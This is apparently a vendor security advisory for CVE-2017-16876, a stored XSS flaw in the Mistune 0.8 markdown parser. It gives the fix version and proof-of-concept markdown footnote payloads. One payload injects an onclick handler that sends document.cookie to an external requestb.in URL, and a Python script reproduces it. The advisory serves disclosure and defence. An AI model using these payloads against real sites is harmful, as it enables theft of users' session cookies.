We are reliable, trustworthy, and ready for challenges! Hire Us
Mistune – Stored XSS vulnerability in the _keyify function
- Home
- Advisories
- Mistune – Stored XSS vulnerability in the _keyify function
DATE
07.11.2017
Affected Vendor
Lepture
Affected Product
Mistune – The fastest markdown parser in pure Python with renderer features, inspired by marked. – https://github.com/lepture/mistune/
Vulnerable version
0.8
Fixed version
0.8.1
CVSS
6.1 Medium 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Recommendations
Update to Mistune version 0.8.1
Vulnerability details
Alert proof of concept:
Footnote 1 link[^first" onclick="alert(1)].
[^first" onclick="alert(1)]: Footnot
Footnote 1 link[^first" onclick="window.location.href='https://requestb.in/pmppk9pm?www='+escape(document.cookie)].
[^first" onclick="window.location.href='https://requestb.in/pmppk9pm?www='+escape(document.cookie)]: Footnot
Python example:
import mistune
renderer = mistune.Renderer(escape=True, hard_wrap=True)
markdown = mistune.Markdown(renderer=renderer)
print('Works good:', markdown('[asd](qwe"onmouseover=")'))
xss = "Footnote 1 link[^first\" onclick=\"window.location.href='https://requestb.in/qqmmvkqq?www='+escape(document.cookie)].\n[^first\" onclick=\"window.location.href='https://requestb.in/qqmmvkqq?www='+escape(document.cookie)]: Footnot"
print('XSS:', markdown(xss))
CVE
CVE-2017-16876
Credits
Dawid Czarnecki
Do you think the security of your data might be lacking? Let's find the best approach together.
Once you contact us, we will ask you about the project you want to secure.